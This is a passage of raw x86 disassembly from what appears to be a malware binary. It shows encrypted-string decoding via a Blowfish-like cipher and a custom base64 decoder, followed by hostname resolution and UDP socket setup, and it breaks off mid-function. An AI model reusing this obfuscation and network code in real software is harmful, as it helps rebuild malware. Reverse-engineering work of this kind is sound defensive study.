push offset aB2smo_whkew_qr ; "B2smo.WHkeW.QRn4z10ge1I1"
push esi
call sub_41D94C
push offset aX4cty1aeqwx ; "X4Cty1aEQwX/"
push esi
call sub_41D94C
push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
push esi
call sub_41D94C
push offset aErnniHm17t1qrn ; "ERNNi/HM17T1QRn4z10ge1I1"
push esi
call sub_41D94C
push offset aZk1tr0lpp5r0 ; "Zk1Tr0lpP5R0"
push esi
call sub_41D94C
push offset a6ldraK4kds ; "6ldRA/K4kDS/"
push esi
call sub_41D94C
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
push esi
call sub_41D94C
add esp, 40h
push offset aWt4rnWgl6v_ ; "wt4Rn/WGL6V."
push esi
call sub_41D94C
push offset aXxulc08o9rf0 ; "Xxulc08O9rf0"
push esi
call sub_41D94C
push offset aFepmfZswfd ; "FEpMF/ZswFD/"
push esi
call sub_41D94C
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
push esi
call sub_41D94C
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
push esi
call sub_41D94C
push offset a43ucs0rkqux_ ; "43uCS0rkQUx."
push esi
call sub_41D94C
push offset aZjiqo07c20 ; "ZjIqO/07c2/0"
push esi
call sub_41D94C
push offset aA4pllAqpbg_ ; "a4pll/aQpBg."
push esi
call sub_41D94C
add esp, 40h
push offset aNn0i61ujg7h1 ; "NN0i61uJg7H1"
push esi
call sub_41D94C
push offset aEavyh_ic0dc0_0 ; "eAvYh.IC0dc0"
push esi
call sub_41D94C
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_41D94C
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
push esi
call sub_41D94C
push offset aH08_Drzwx_ ; "h/08./drzWX."
push esi
call sub_41D94C
push offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
push esi
call sub_41D94C
push offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
push esi
call sub_41D94C
push offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
push esi
call sub_41D94C
add esp, 40h
push offset aQnqb5Bavh1_mns ; "qnQb5/bavH1.Mnsrm1FhS.k."
push esi
call sub_41D94C
push offset aFr3nb0ttxid1mn ; "Fr3NB0Ttxid1Mnsrm1FhS.k."
push esi
call sub_41D94C
push offset aIvrum__ltyn0x9 ; "iVRum..LtyN0X9DHH1k06Rd1"
push esi
call sub_41D94C
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
push esi
call sub_41D94C
push offset a68gmpWcesMnsrm ; "68gmp/wceS//Mnsrm1FhS.k."
push esi
call sub_41D94C
push offset aYuohiGmfzv ; "yUoHi/GMFZv/"
push esi
call sub_41D94C
push offset aX1pikRo_tl_ ; "X1PIk/rO.TL."
push esi
call sub_41D94C
push offset aZrbax_zpsbs_ty ; "ZRbAx.zPSBs.TY84s/myQpz0"
push esi
call sub_41D94C
add esp, 40h
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push esi
call sub_41D94C
push offset aPnmnw_7rscg0 ; "PnmNw.7RScG0"
push esi
call sub_41D94C
push offset aBsxrm1gm35a0ty ; "BSXRM1GM35a0TY84s/myQpz0"
push esi
call sub_41D94C
push offset aCkdai0gd9lr_ ; "ckdai0Gd9lr."
push esi
call sub_41D94C
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
push esi
call sub_41D94C
push offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
push esi
call sub_41D94C
push offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
push esi
call sub_41D94C
push offset a8niowW5nrt1 ; "8nIOw/w5nRT1"
push esi
call sub_41D94C
add esp, 40h
push offset aM7pC1xaudb1ty8 ; "m7P/c1xaudB1TY84s/myQpz0"
push esi
call sub_41D94C
push offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
push esi
call sub_41D94C
push offset aFr5ye08wltp1mn ; "fr5ye08Wltp1Mnsrm1FhS.k."
push esi
call sub_41D94C
push offset a8sxng_tdfrt ; "8sXNG.tDfrt/"
push esi
call sub_41D94C
push offset a75bqq0i7ucw0 ; "75bQQ0i7ucW0"
push esi
call sub_41D94C
push offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
push esi
call sub_41D94C
push offset a2fulsVpayi0 ; "2FUlS/VPAyI0"
push esi
call sub_41D94C
push offset aCwje81zpyq1_ty ; "CWje81ZpYQ1.TY84s/myQpz0"
push esi
call sub_41D94C
add esp, 40h
push offset aXtyre1_rjar_xf ; "XtyrE1.RJaR.xfK1r.VuQwI."
push esi
call sub_41D94C
push offset aZshqz13bz2w1 ; "ZsHqZ13bZ2w1"
push esi
call sub_41D94C
push offset aJjc1c1nn0bl0ty ; "JJc1c1nn0bL0TY84s/myQpz0"
push esi
call sub_41D94C
add esp, 18h
pop esi
retn
sub_41D98A endp
; =============== S U B R O U T I N E =======================================
sub_41E077 proc near ; CODE XREF: sub_41E8CB+68�p
var_8 = dword ptr -8
push esi
push 48h
mov esi, ecx
call sub_423F55
mov [esi], eax
mov [esp+8+var_8], 13A0h
call sub_423F55
mov [esi+4], eax
pop ecx
mov eax, esi
pop esi
retn
sub_41E077 endp
; =============== S U B R O U T I N E =======================================
sub_41E097 proc near ; CODE XREF: sub_41E8CB+13F�p
push esi
mov esi, ecx
push dword ptr [esi]
call sub_421C78
push dword ptr [esi+4]
call sub_421C78
pop ecx
pop ecx
pop esi
retn
sub_41E097 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E0AD proc near ; CODE XREF: sub_41E791+C0�p
; sub_41E791+F3�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ecx]
mov edx, [eax]
mov eax, [ecx+4]
xor ecx, ecx
xor edx, [edi]
xor ebx, ebx
mov [ebp+var_C], edi
mov [ebp+var_4], edx
mov esi, edx
mov cl, byte ptr [ebp+var_4+2]
mov bl, dh
shr esi, 18h
mov ecx, [eax+ecx*4+4E8h]
add ecx, [eax+esi*4]
mov esi, 0FFh
and edx, esi
xor ecx, [eax+ebx*4+9D0h]
add ecx, [eax+edx*4+0EB8h]
mov edx, [ebp+arg_4]
xor ecx, [edi+4]
xor ecx, [edx]
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+8]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+0Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+10h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+14h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+18h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+1Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+20h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+24h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor edx, [edi+28h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
xor ebx, ebx
add edx, [eax+edi*4]
mov bl, byte ptr [ebp+var_4+1]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+2Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+30h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+34h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+38h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+3Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
mov eax, [ebp+var_4]
xor edx, [edi+40h]
xor eax, edx
mov edx, [ebp+arg_4]
xor ecx, [edi+44h]
pop edi
mov [edx], eax
mov eax, [ebp+arg_0]
pop esi
pop ebx
mov [eax], ecx
leave
retn 8
sub_41E0AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E41E proc near ; CODE XREF: sub_41E8CB+D5�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ecx]
xor ebx, ebx
mov [ebp+var_C], edi
mov edx, [edi+44h]
xor edx, [eax]
mov eax, [ecx+4]
xor ecx, ecx
mov [ebp+var_4], edx
mov esi, edx
mov cl, byte ptr [ebp+var_4+2]
mov bl, dh
shr esi, 18h
mov ecx, [eax+ecx*4+4E8h]
add ecx, [eax+esi*4]
mov esi, 0FFh
and edx, esi
xor ecx, [eax+ebx*4+9D0h]
add ecx, [eax+edx*4+0EB8h]
mov edx, [ebp+arg_4]
xor ecx, [edi+40h]
xor ecx, [edx]
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+3Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+38h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+34h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+30h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+2Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+28h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+24h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+20h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor edx, [edi+1Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
xor ebx, ebx
add edx, [eax+edi*4]
mov bl, byte ptr [ebp+var_4+1]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+18h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+14h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+10h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+0Ch]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+8]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
mov eax, [ebp+var_4]
xor edx, [edi+4]
xor eax, edx
mov edx, [edi]
xor edx, ecx
mov ecx, [ebp+arg_0]
pop edi
pop esi
mov [ecx], edx
mov ecx, [ebp+arg_4]
pop ebx
mov [ecx], eax
leave
retn 8
sub_41E41E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E791 proc near ; CODE XREF: sub_41E8CB+79�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
push edi
mov [ebp+var_8], ecx
xor eax, eax
loc_41E7A1: ; CODE XREF: sub_41E791+21�j
mov edx, [ecx]
mov edi, dword_447868[eax]
mov [eax+edx], edi
add eax, 4
cmp eax, 48h
jl short loc_41E7A1
xor eax, eax
loc_41E7B6: ; CODE XREF: sub_41E791+41�j
mov edx, 13Ah
loc_41E7BB: ; CODE XREF: sub_41E791+3A�j
mov edi, [ecx+4]
mov ebx, dword_4478B0[eax]
mov [eax+edi], ebx
add eax, 4
dec edx
jnz short loc_41E7BB
cmp eax, 13A0h
jl short loc_41E7B6
mov ebx, [ebp+arg_0]
mov [ebp+var_4], esi
loc_41E7DA: ; CODE XREF: sub_41E791+A9�j
lea eax, [esi+1]
cdq
idiv [ebp+arg_4]
mov eax, [ebp+var_8]
movzx edi, byte ptr [esi+ebx]
mov eax, [eax]
shl edi, 18h
and edi, 0FF00FFFFh
movzx ecx, byte ptr [edx+ebx]
mov edx, [ebp+var_4]
add [ebp+var_4], 4
add edx, eax
lea eax, [esi+2]
mov [ebp+var_C], edx
cdq
idiv [ebp+arg_4]
shl ecx, 10h
xor ecx, edi
xor eax, eax
xor cx, cx
mov ah, [edx+ebx]
xor eax, ecx
mov ecx, eax
lea eax, [esi+3]
cdq
idiv [ebp+arg_4]
movzx eax, byte ptr [edx+ebx]
or ecx, eax
mov eax, [ebp+var_C]
xor [eax], ecx
lea eax, [esi+4]
cdq
idiv [ebp+arg_4]
cmp [ebp+var_4], 48h
mov esi, edx
jl short loc_41E7DA
xor esi, esi
mov [ebp+arg_4], esi
mov [ebp+arg_0], esi
loc_41E844: ; CODE XREF: sub_41E791+DC�j
mov edi, [ebp+var_8]
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, edi
call sub_41E0AD
mov eax, [edi]
mov ecx, [ebp+arg_4]
mov [esi+eax], ecx
mov eax, [edi]
mov ecx, [ebp+arg_0]
mov [esi+eax+4], ecx
add esi, 8
cmp esi, 48h
jl short loc_41E844
push 4
pop esi
loc_41E872: ; CODE XREF: sub_41E791+117�j
mov ebx, 9Dh
loc_41E877: ; CODE XREF: sub_41E791+10F�j
mov edi, [ebp+var_8]
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+arg_4]
push eax
mov ecx, edi
call sub_41E0AD
mov eax, [edi+4]
mov ecx, [ebp+arg_4]
mov [esi+eax-4], ecx
mov eax, [edi+4]
mov ecx, [ebp+arg_0]
mov [esi+eax], ecx
add esi, 8
dec ebx
jnz short loc_41E877
cmp esi, 13A4h
jl short loc_41E872
pop edi
pop esi
pop ebx
leave
retn 8
sub_41E791 endp
; =============== S U B R O U T I N E =======================================
sub_41E8B1 proc near ; CODE XREF: sub_41E8CB+9A�p
; sub_41E8CB+B5�p
arg_0 = byte ptr 4
xor eax, eax
loc_41E8B3: ; CODE XREF: sub_41E8B1+15�j
mov ecx, off_448C50
mov cl, [ecx+eax]
cmp cl, [esp+arg_0]
jz short locret_41E8CA
inc eax
cmp eax, 40h
jl short loc_41E8B3
xor eax, eax
locret_41E8CA: ; CODE XREF: sub_41E8B1+F�j
retn
sub_41E8B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E8CB proc near ; CODE XREF: sub_41D94C+1E�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push [ebp+arg_4]
mov esi, dword_42F0DC
call esi ; dword_42F0DC
add eax, 0Ch
push eax
call sub_423F55
pop ecx
mov ebx, eax
push [ebp+arg_4]
mov [ebp+var_8], ebx
push ebx
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_0]
test eax, eax
jz loc_41EA15
cmp byte ptr [eax], 0
jz loc_41EA15
push edi
mov edi, ebx
push [ebp+arg_4]
call esi ; dword_42F0DC
add eax, 0Ch
push eax
call sub_423F55
cmp byte ptr [ebx], 0
pop ecx
mov [ebp+var_4], eax
jz short loc_41E92B
loc_41E925: ; CODE XREF: sub_41E8CB+5E�j
inc edi
cmp byte ptr [edi], 0
jnz short loc_41E925
loc_41E92B: ; CODE XREF: sub_41E8CB+58�j
xor eax, eax
lea ecx, [ebp+var_10]
stosd
stosd
stosd
call sub_41E077
push [ebp+arg_0]
call esi ; dword_42F0DC
push eax
lea ecx, [ebp+var_10]
push [ebp+arg_0]
call sub_41E791
cmp byte ptr [ebx], 0
mov esi, [ebp+var_4]
mov edi, ebx
jz loc_41E9FD
loc_41E957: ; CODE XREF: sub_41E8CB+129�j
and [ebp+arg_0], 0
and [ebp+arg_4], 0
xor edx, edx
loc_41E961: ; CODE XREF: sub_41E8CB+AD�j
mov al, [edi]
inc edi
push eax
call sub_41E8B1
pop ecx
mov ecx, edx
add edx, 6
shl eax, cl
or [ebp+arg_0], eax
cmp edx, 24h
jl short loc_41E961
xor edx, edx
loc_41E97C: ; CODE XREF: sub_41E8CB+C8�j
mov al, [edi]
inc edi
push eax
call sub_41E8B1
pop ecx
mov ecx, edx
add edx, 6
shl eax, cl
or [ebp+arg_4], eax
cmp edx, 24h
jl short loc_41E97C
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_10]
push eax
lea eax, [ebp+arg_4]
push eax
call sub_41E41E
push 18h
xor edx, edx
pop eax
loc_41E9AA: ; CODE XREF: sub_41E8CB+FE�j
mov ebx, 0FFh
mov ecx, eax
shl ebx, cl
push 18h
sub eax, 8
pop ecx
sub ecx, edx
add edx, 8
and ebx, [ebp+arg_4]
shr ebx, cl
mov [esi], bl
inc esi
cmp eax, 0FFFFFFF8h
jg short loc_41E9AA
push 18h
xor edx, edx
pop eax
loc_41E9D0: ; CODE XREF: sub_41E8CB+124�j
mov ebx, 0FFh
mov ecx, eax
shl ebx, cl
push 18h
sub eax, 8
pop ecx
sub ecx, edx
add edx, 8
and ebx, [ebp+arg_0]
shr ebx, cl
mov [esi], bl
inc esi
cmp eax, 0FFFFFFF8h
jg short loc_41E9D0
cmp byte ptr [edi], 0
jnz loc_41E957
mov ebx, [ebp+var_8]
loc_41E9FD: ; CODE XREF: sub_41E8CB+86�j
and byte ptr [esi], 0
push ebx
call sub_421C78
pop ecx
lea ecx, [ebp+var_10]
call sub_41E097
mov eax, [ebp+var_4]
pop edi
jmp short loc_41EA17
; ---------------------------------------------------------------------------
loc_41EA15: ; CODE XREF: sub_41E8CB+31�j
; sub_41E8CB+3A�j
mov eax, ebx
loc_41EA17: ; CODE XREF: sub_41E8CB+148�j
pop esi
pop ebx
leave
retn
sub_41E8CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA1B proc near ; DATA XREF: sub_403B2C+61DF�o
var_10146 = byte ptr -10146h
var_10144 = byte ptr -10144h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10144h
call sub_4220C0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Bh
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov edi, [ebp+var_144]
xor ecx, ecx
inc ecx
mov [ebp+arg_0], edi
cmp [ebp+var_20], ecx
mov [eax+128h], ecx
jnz short loc_41EA5F
push offset dword_4552D0
call sub_4140CF
pop ecx
jmp short loc_41EA77
; ---------------------------------------------------------------------------
loc_41EA5F: ; CODE XREF: sub_41EA1B+35�j
mov esi, offset dword_4552D0
push 100h
push esi
call dword_42F2A8 ; gethostname
push esi
call dword_42F274 ; gethostbyname
loc_41EA77: ; CODE XREF: sub_41EA1B+42�j
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
push 11h
push 2
push 2
call dword_454394 ; socket
mov [ebp+var_8], eax
xor ebx, ebx
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_C0]
mov [ebp+var_18], 2
push eax
call dword_45434C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_41EB09
lea eax, [ebp+var_C0]
push eax
call dword_454398 ; gethostbyname
cmp eax, ebx
jnz short loc_41EB02
cmp [ebp+var_24], ebx
jnz short loc_41EAF1
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_140]
